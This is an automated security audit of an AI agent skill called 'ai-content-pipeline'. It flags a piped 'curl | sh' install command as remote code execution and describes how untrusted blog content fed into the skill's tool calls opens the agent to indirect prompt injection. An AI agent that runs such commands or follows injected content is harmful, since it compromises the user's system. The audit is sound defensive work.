ai-content-pipeline
Fail
Audited by Gen Agent Trust Hub on Feb 16, 2026
Risk Level: CRITICALREMOTE_CODE_EXECUTIONCOMMAND_EXECUTIONPROMPT_INJECTION
Full Analysis
- [Remote Code Execution] (CRITICAL): The skill includes instructions to execute
curl -fsSL https://cli.inference.sh | sh. This is a classic RCE pattern where an unverified script is downloaded and piped directly to the system shell. The domain 'cli.inference.sh' is not within the Trusted External Sources scope. - [Indirect Prompt Injection] (HIGH): The skill is designed to ingest and process untrusted external data (e.g.,
<blog-content>in the Blog to Video Pipeline) and interpolate it into subsequent tool calls. \n * Ingestion points: External data sources like blog posts and user-provided script texts.\n * Boundary markers: None identified; untrusted content is interpolated directly into command arguments.\n * Capability inventory: The agent has permission to run anyinfshcommand viaBash(infsh *).\n * Sanitization: No sanitization or validation of input data is performed before it is used in CLI commands. - [Command Execution] (MEDIUM): The skill defines broad permissions for the
infshCLI tool. This allows for complex operations including network interactions and media processing which, if hijacked, could be used for malicious purposes within the agent's environment.
Recommendations
- CRITICAL: Downloads and executes remote code from untrusted source(s): https://cli.inference.sh - DO NOT USE
- AI detected serious security threats
Audit Metadata